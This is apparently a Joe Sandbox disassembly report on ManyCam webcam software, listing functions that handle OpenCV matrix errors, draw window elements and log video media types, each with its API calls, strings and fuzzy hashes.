Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\cxutils.cpp$Both matrices should be floating-point (single or double precision)$Input parameter is not a valid matrix$Output parameter is not a valid matrix$The matrix of coefficients must be 1-dimensional vector of 3 or 4 elements$The matrix of roots must be 1-dimensional vector of 3 elements$cvSolveCubic
API String ID: 2619118453-785790621
Opcode ID: 05d79962c86b910938b7d7228f5e8b88b15f00f44c62399a87454b9ed6f78aa6
Instruction ID: bfbd8b88c7249aaad59ea8c5a842d69e2780e2baa80a9a99c89b02ad727a39ad
Opcode Fuzzy Hash: 05d79962c86b910938b7d7228f5e8b88b15f00f44c62399a87454b9ed6f78aa6
Instruction Fuzzy Hash: D6D12372F14601A7C316AE44D84529ABBB4FB847A0F310E9CF4D6762F5FB3289258BC1

Function 004018D0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 298COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000FB,cvCylGetModelPosition,Null pointer to tracker context.,.\src\cyltracker.cpp,00000223,?,?,?), ref: 004018F9
cvError.CXCORE099(000000FB,cvCylGetModelPosition,Null pointer to head config structure.,.\src\cyltracker.cpp,00000226,?,?,?), ref: 00401925

Strings

.\src\cyltracker.cpp, xrefs: 004018E8, 00401914
Null pointer to tracker context., xrefs: 004018ED
Null pointer to head config structure., xrefs: 00401919
cvCylGetModelPosition, xrefs: 004018F2, 0040191E

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\src\cyltracker.cpp$Null pointer to head config structure.$Null pointer to tracker context.$cvCylGetModelPosition
API String ID: 2619118453-1894096719
Opcode ID: 94b001c55bfdf0bd65362a55d97ec9160b4cac4fd4508785464b6c2c950edd66
Instruction ID: 9f04fb016eb92f5e31f0ef4e1e4ba15881229676976377827f4aa03fecfd0c42
Opcode Fuzzy Hash: 94b001c55bfdf0bd65362a55d97ec9160b4cac4fd4508785464b6c2c950edd66
Instruction Fuzzy Hash: 95C12770609210EFC354AF14D58996ABFB0FF84340F929D98F4E5672A9D730E971CB86

Function 00B9E130 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 284COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvGetMat,NULL array pointer is passed,.\cxarray.cpp,00000ADB,?,?,?,?), ref: 00B9E4BC

Strings

Unrecognized or unsupported array type, xrefs: 00B9E495
Input array has NULL data pointer, xrefs: 00B9E3CD
.\cxarray.cpp, xrefs: 00B9E175, 00B9E1A6, 00B9E1D8, 00B9E21D, 00B9E2A4, 00B9E2CE, 00B9E358, 00B9E3C8, 00B9E3E4, 00B9E490, 00B9E4AB
The image is interleaved and has over CV_CN_MAX channels, xrefs: 00B9E2D3
Inner function failed., xrefs: 00B9E2A9
NULL array pointer is passed, xrefs: 00B9E4B0
Pixel order should be used with coi == 0, xrefs: 00B9E35D
The matrix has NULL data pointer, xrefs: 00B9E17A
cvGetMat, xrefs: 00B9E1E2, 00B9E227, 00B9E2AE, 00B9E2D8, 00B9E362, 00B9E3EE, 00B9E49A, 00B9E4B5
Images with planar data layout should be used with COI selected, xrefs: 00B9E222
The image has NULL data pointer, xrefs: 00B9E1AB
Only continuous nD arrays are supported here, xrefs: 00B9E3E9

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\cxarray.cpp$Images with planar data layout should be used with COI selected$Inner function failed.$Input array has NULL data pointer$NULL array pointer is passed$Only continuous nD arrays are supported here$Pixel order should be used with coi == 0$The image has NULL data pointer$The image is interleaved and has over CV_CN_MAX channels$The matrix has NULL data pointer$Unrecognized or unsupported array type$cvGetMat
API String ID: 2619118453-2064294148
Opcode ID: 79cb27446025d6b1d7391f28e854eae0eb994208d5e8fe63f1c05ca66607e40f
Instruction ID: d90146b51b308642f386815c51133afeeeb989c9c81808a41e351bab6aa58b06
Opcode Fuzzy Hash: 79cb27446025d6b1d7391f28e854eae0eb994208d5e8fe63f1c05ca66607e40f
Instruction Fuzzy Hash: CA91EE71744301AFCB18CE18DC92E2AB7E6FBA5710F1942BDF9665B3D1D3B0E9808A45

Function 0041EFD0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 268windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

GetSysColorBrush.USER32(0000000F), ref: 0041F03F
FillRect.USER32(00000000,000000FF,00000000), ref: 0041F053
LoadIconW.USER32(00000000,00000087), ref: 0041F0A1
DrawIconEx.USER32(00000000,0000000A,0000000A,00529873,0000000A,0000000A,00000000,00000000,00000003), ref: 0041F0D3
DeleteObject.GDI32(00529873), ref: 0041F0DD
SetBkMode.GDI32(00000000,00000001), ref: 0041F110
GetTextColor.GDI32(00000000), ref: 0041F11F
SetTextColor.GDI32(00000000,00000000), ref: 0041F130
memset.MSVCR80 ref: 0041F1DA

Part of subcall function 00417240: CreateFontIndirectW.GDI32(00409661), ref: 0041724B

SelectObject.GDI32(00000000,00000000), ref: 0041F21A
memset.MSVCR80 ref: 0041F293
memset.MSVCR80 ref: 0041F2BA
wcslen.MSVCR80 ref: 0041F35E
DrawTextW.USER32(00000000,?,00000000), ref: 0041F385
SelectObject.GDI32(00000000,?), ref: 0041F39D

Strings

This feature requires a special video codec to function properly. Unfortunately, xrefs: 0041F22B
Verdana, xrefs: 0041F1A0
visit the ManyCam website help page , xrefs: 0041F2A0
this codec doesn, xrefs: 0041F27B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ColorObjectTextmemset$DrawIconRectSelect$BrushClientCreateDeleteFillFontIndirectLoadModewcslen
String ID: This feature requires a special video codec to function properly. Unfortunately$Verdana$this codec doesn$visit the ManyCam website help page
API String ID: 923866622-1098169901
Opcode ID: 3f31620da8421e62cd21c6cfa0caa7031ff0a88d6dc715023633d5f283328bfa
Instruction ID: 6f95be4a3cc1c25362b5af6b12462e5a34df96a0e09e544e1f1783aa57f49324
Opcode Fuzzy Hash: 3f31620da8421e62cd21c6cfa0caa7031ff0a88d6dc715023633d5f283328bfa
Instruction Fuzzy Hash: 83D1F7B0D002189FDB14DF99DC54BDEBBB8BF58304F1081AAE509AB391DB746A89CF54

Function 00BC3080 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 201COMMON

Download Yara Rule

APIs

cvInitNArrayIterator.GLU32(00000001,?,00000000,?,?,00000000), ref: 00BC30DE
cvGetErrStatus.GLU32 ref: 00BC30E6
memset.MSVCR80 ref: 00BC313C
cvNextNArraySlice.GLU32(?,?,00000000,?), ref: 00BC3146
cvNextNArraySlice.GLU32(?,?,40000000,?,?), ref: 00BC317E
cvGetMat.GLU32 ref: 00BC31E3
cvGetErrStatus.GLU32 ref: 00BC31ED
cvError.GLU32(000000FF,cvSetZero,Inner function failed.,.\cxcopy.cpp,000002D0), ref: 00BC320C
cvError.GLU32(000000E8,cvSetZero,coi is not supported,.\cxcopy.cpp,000002D2), ref: 00BC3239
memset.MSVCR80 ref: 00BC3297

Strings

.\cxcopy.cpp, xrefs: 00BC31FB, 00BC3228, 00BC32C9
OpenCV function failed, xrefs: 00BC32CE
Inner function failed., xrefs: 00BC3200
cvSetZero, xrefs: 00BC3205, 00BC3232, 00BC32D3
coi is not supported, xrefs: 00BC322D

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Array$ErrorNextSliceStatusmemset$InitIterator
String ID: .\cxcopy.cpp$Inner function failed.$OpenCV function failed$coi is not supported$cvSetZero
API String ID: 1474594845-3837322588
Opcode ID: 3424c09353fb366c177e87e3d2f63bba7e86ae42fa10754060a7dc85f806ea80
Instruction ID: cc70435c3bda42cff77b481dcd0757d2b556db1a8172cf98a86ce29131db9d85
Opcode Fuzzy Hash: 3424c09353fb366c177e87e3d2f63bba7e86ae42fa10754060a7dc85f806ea80
Instruction Fuzzy Hash: D9517EB67407041BE734DA18EC83FAB73D8EB94B04F884A7DF545D7281F675EA048692

Function 004D1F20 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 394windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D2030
GetTickCount.KERNEL32 ref: 004D2076
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D20A0
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D212D
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D21FB
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D228A
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D22EE
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D2358
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D23CB
GetTickCount.KERNEL32 ref: 004D23FB
IsWindow.USER32(?), ref: 004D243D
PostMessageW.USER32(?,00008190,000000FF,FFFFFFFF), ref: 004D245E
SendMessageW.USER32(00000000,00008194,00000000,?), ref: 004D249E
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D24B5
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D24E2

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CPlayList::ActivateItem (%s) pos=%d reset=%d, xrefs: 004D1F6A
fUS, xrefs: 004D2447
Couldn't activate item., xrefs: 004D221C

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Concurrency::cancellation_token_source::~cancellation_token_source$CountMessageTickclock$AllocatorDebugHeapPostSendWindow
String ID: CPlayList::ActivateItem (%s) pos=%d reset=%d$Couldn't activate item.$fUS
API String ID: 2714024287-817954826
Opcode ID: 72d5d28fb81e9cb43a23bfa0ae115a46047e039f4e0d0dee57b90eda3ef89231
Instruction ID: cd11fd919a321e88f285589761f8251e1514877f7c039c8d1d7105039d16572d
Opcode Fuzzy Hash: 72d5d28fb81e9cb43a23bfa0ae115a46047e039f4e0d0dee57b90eda3ef89231
Instruction Fuzzy Hash: FA027970A00218DFDB14DBA4CD61BEEBBB1AF55308F14819EE5096B382CB746E89CF55

Function 004C8720 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 318COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C878C
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C879B
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C87D2
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C87E1

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CManyCamModel::UpdateGraphTopologyOnSourceChange, xrefs: 004C8755

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Concurrency::cancellation_token_source::~cancellation_token_source$clock$AllocatorDebugHeap
String ID: CManyCamModel::UpdateGraphTopologyOnSourceChange
API String ID: 952932671-1321120180
Opcode ID: 0b90ff5f2a21a3f5109c721d4de8bebc9373ba52e13293d6d0797d08fd4d5099
Instruction ID: 10940e179f8bca40d99c735d3df1e6ff842ee16e2e5db1de052c77a05b9f2183
Opcode Fuzzy Hash: 0b90ff5f2a21a3f5109c721d4de8bebc9373ba52e13293d6d0797d08fd4d5099
Instruction Fuzzy Hash: 5BE13E70D04248DECB04EFA5D961BEEBBB0AF15308F10815FF4166B282EF785A45DB99

Function 00B9E820 Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 189COMMON

Download Yara Rule

APIs

cvError.GLU32(000000F7,cvInitImageHeader,null pointer to header,.\cxarray.cpp,00000D18), ref: 00B9E842

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

memset.MSVCR80 ref: 00B9E856
cvGetErrStatus.GLU32 ref: 00B9E885
cvError.GLU32(000000FF,cvInitImageHeader,Inner function failed.,.\cxarray.cpp,00000D1D), ref: 00B9E8A4

Strings

.\cxarray.cpp, xrefs: 00B9E831, 00B9E893, 00B9E921, 00B9E953, 00B9E986, 00B9EA28
Bad input origin, xrefs: 00B9E958
Inner function failed., xrefs: 00B9E898
Unsupported format, xrefs: 00B9E926
cvInitImageHeader, xrefs: 00B9E83B, 00B9E89D, 00B9E92B, 00B9E95D, 00B9E990, 00B9EA32
Bad input align, xrefs: 00B9E98B
null pointer to header, xrefs: 00B9E836
Bad input roi, xrefs: 00B9EA2D

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorStatus$memset
String ID: .\cxarray.cpp$Bad input align$Bad input origin$Bad input roi$Inner function failed.$Unsupported format$cvInitImageHeader$null pointer to header
API String ID: 2816036979-2180073849
Opcode ID: 7b700a3297b0630dc0077dc249a5066bed86ee67d1b1eb8732bcb94e6968ff2a
Instruction ID: 869ba925c74c6049e2eaf8ce326110c7623e493e66184d5cc6eae770efa7ad17
Opcode Fuzzy Hash: 7b700a3297b0630dc0077dc249a5066bed86ee67d1b1eb8732bcb94e6968ff2a
Instruction Fuzzy Hash: D35137327443041BDB20DE59FC82B1AB3D0FB91720F1906BEF965D7AE1D2B2E8818650

Function 004B2A80 Relevance: 31.7, APIs: 3, Strings: 15, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 004B76D0: fwprintf.MSVCR80 ref: 004B7764
Part of subcall function 004B76D0: fflush.MSVCR80 ref: 004B7774

StringFromGUID2.OLE32()K,?,00000040,)K,0056F910,)K,00574DDC), ref: 004B2C30

Strings

Mediatype info:, xrefs: 004B2A99
Subtype = GUID_NULL, xrefs: 004B2B38
)K, xrefs: 004B2AB0, 004B2AD6, 004B2B00, 004B2B28, 004B2B54, 004B2B7D, 004B2BAA, 004B2BD5, 004B2BFC, 004B2C29, 004B2C54, 004B2C64, 004B2C6D, 004B2C76, 004B2AB3, 004B2AD9, 004B2B03, 004B2B2E, 004B2B5A, 004B2B83, 004B2BB0, 004B2BDB, 004B2C02, 004B2C2F, 004B2C5A
Major type = GUID_NULL, xrefs: 004B2ABD
Subtype = MEDIASUBTYPE_RGB24, xrefs: 004B2B64
Format type = FORMAT_VideoInfo, xrefs: 004B2C0C
Major type = MEDIATYPE_Video, xrefs: 004B2AE3
Format type = GUID_NULL, xrefs: 004B2BE5
Major type = %s, xrefs: 004B2B11
Bit count = %d, xrefs: 004B2C8D
vids, xrefs: 004B2AD1
Format type = %s, xrefs: 004B2C3D
Subtype = MEDIASUBTYPE_RGB32, xrefs: 004B2B8D
Frame size = %dx%d, xrefs: 004B2CB3
Subtype = %s, xrefs: 004B2BBE

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: FromStringfflushfwprintf
String ID: Bit count = %d$Format type = %s$Format type = FORMAT_VideoInfo$Format type = GUID_NULL$Frame size = %dx%d$Major type = %s$Major type = GUID_NULL$Major type = MEDIATYPE_Video$Mediatype info:$Subtype = %s$Subtype = GUID_NULL$Subtype = MEDIASUBTYPE_RGB24$Subtype = MEDIASUBTYPE_RGB32$vids$)K
API String ID: 2684700382-3987823964
Opcode ID: e2d8f3dbb539b25badfc673ac368b6ee49d21c1c39eb2143ec57eff8d32f1992
Instruction ID: 0a30e523ff0296b33be7bff9fb0a9039800934aade4f4bd872009a2dad4e24fd
Opcode Fuzzy Hash: e2d8f3dbb539b25badfc673ac368b6ee49d21c1c39eb2143ec57eff8d32f1992
Instruction Fuzzy Hash: A951C870E5420867DB10AF19DC57EDE3B34BF44705F00841AB908A6283EFB4EA59D7BA

Function 00BD6160 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 494memoryCOMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,?,00000000), ref: 00BD6218
cvGetErrStatus.GLU32 ref: 00BD6222
cvGetMat.GLU32(?,?,?,00000000), ref: 00BD6292
cvGetErrStatus.GLU32 ref: 00BD629D
cvFree_.GLU32(?), ref: 00BD6573
__alloca_probe_16.LIBCMT ref: 00BD658F
cvAlloc.GLU32(?), ref: 00BD65AC
cvGetErrStatus.GLU32 ref: 00BD65B7
cvErrorFromIppStatus.GLU32(00000000,cvDCT,OpenCV function failed,.\cxdxt.cpp,00000A8B), ref: 00BD66E5
cvError.GLU32(FFFFFF2E,cvDCT,Only 32fC1 and 64fC1 formats are supported,.\cxdxt.cpp,00000A47), ref: 00BD672F
cvFree_.GLU32(?), ref: 00BD6761

Strings

Odd-size DCT's are not implemented, xrefs: 00BD66BF
OpenCV function failed, xrefs: 00BD66DA
cvDCT, xrefs: 00BD623A, 00BD625A, 00BD62F9, 00BD66C4, 00BD66DF, 00BD6725
Inner function failed., xrefs: 00BD6235
Only 32fC1 and 64fC1 formats are supported, xrefs: 00BD6720
.\cxdxt.cpp, xrefs: 00BD6230, 00BD6250, 00BD62EF, 00BD66BA, 00BD66D5, 00BD671B

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$ErrorFree_$AllocFrom__alloca_probe_16
String ID: .\cxdxt.cpp$Inner function failed.$Odd-size DCT's are not implemented$Only 32fC1 and 64fC1 formats are supported$OpenCV function failed$cvDCT
API String ID: 2153135076-221668188
Opcode ID: 2c50d417ff7f03b373cd5695840728c501ad0e03fe190628fad638dd5fbe125d
Instruction ID: 368cd0e1e592996a1189d4e01854c13f9ba52ea87203f3b64a68ac64caa54bdd
Opcode Fuzzy Hash: 2c50d417ff7f03b373cd5695840728c501ad0e03fe190628fad638dd5fbe125d
Instruction Fuzzy Hash: 0A125BB1E002199BCF24CF99D881AAEF7F5FB58714F1481AAE815E7344E770A941CF91

Function 00423D70 Relevance: 30.2, APIs: 20, Instructions: 195windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000005), ref: 00423DF1
GetSysColor.USER32(0000000D), ref: 00423DFC
GetSysColor.USER32(00000008), ref: 00423E07
DrawFocusRect.USER32(00000000,?), ref: 00423E29
SetTextColor.GDI32(00000000,?), ref: 00423E65
SetBkColor.GDI32(00000000,?), ref: 00423E76
CreateSolidBrush.GDI32(?), ref: 00423E80
FillRect.USER32(00000000,?,?), ref: 00423E98
DeleteObject.GDI32(?), ref: 00423EA2
SetTextColor.GDI32(00000000,?), ref: 00423EB5
SetBkColor.GDI32(00000000,?), ref: 00423EC6
CreateSolidBrush.GDI32(?), ref: 00423ED0
FillRect.USER32(00000000,?,?), ref: 00423EE8
DeleteObject.GDI32(?), ref: 00423EF2
DrawFocusRect.USER32(00000000,?), ref: 00423F0B
GetSysColor.USER32(00000011), ref: 00423F3B
SetTextColor.GDI32(00000000,00000000), ref: 00423F4F
SetBkMode.GDI32(00000000,00000001), ref: 00423F66
wcslen.MSVCR80 ref: 00423F8C
TextOutW.GDI32(00000000,?,?,?,00000000), ref: 00423FAF

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Color$RectText$BrushCreateDeleteDrawFillFocusObjectSolid$Modewcslen
String ID:
API String ID: 2588219260-0
Opcode ID: 2e45cf5c80c4b8fd4d600e7d9edbefb9a3a0af178287644c4581e20515c78400
Instruction ID: da729acaff73935f9bd159455f2e2352e59e7efa03225867f080d08a233a209d
Opcode Fuzzy Hash: 2e45cf5c80c4b8fd4d600e7d9edbefb9a3a0af178287644c4581e20515c78400
Instruction Fuzzy Hash: AA81CA75A00218EFDB08CF94E9989AEBBB5FF98301F108159F609A7350DB34AE45DF94

Function 00402C80 Relevance: 30.2, APIs: 20, Instructions: 174COMMON

Download Yara Rule

APIs

Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,00000008,00000001,?,00000000,?,0040120F), ref: 00403198
Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,80000010,00000001,?,00000000,?,0040120F), ref: 004031AF
Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,80000010,00000001,?,?,?,?,?,00000000,?,0040120F), ref: 004031C7

cvCreateMat.CXCORE099(00000004,00000004,00000005,0040120F), ref: 00402C98
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,0040120F), ref: 00402CB4
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,0040120F), ref: 00402CD0
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,0040120F), ref: 00402CEC
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,?,?,?,0040120F), ref: 00402D08
cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402D24
cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402D40
cvCreateMat.CXCORE099(00000003,00000004,00000005), ref: 00402D5C
cvCreateMat.CXCORE099(00000003,00000004,00000005), ref: 00402D78
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402D94
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DB0
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DCC
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DE8
cvCreateMat.CXCORE099(00000003,00000001,00000005), ref: 00402E04
cvCreateMat.CXCORE099(00000006,00000006,00000005), ref: 00402E20
cvCreateMat.CXCORE099(00000006,00000001,00000005), ref: 00402E38
cvCreateMat.CXCORE099(00000006,00000001,00000005), ref: 00402E50
cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402E68
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402E80
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402E98

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
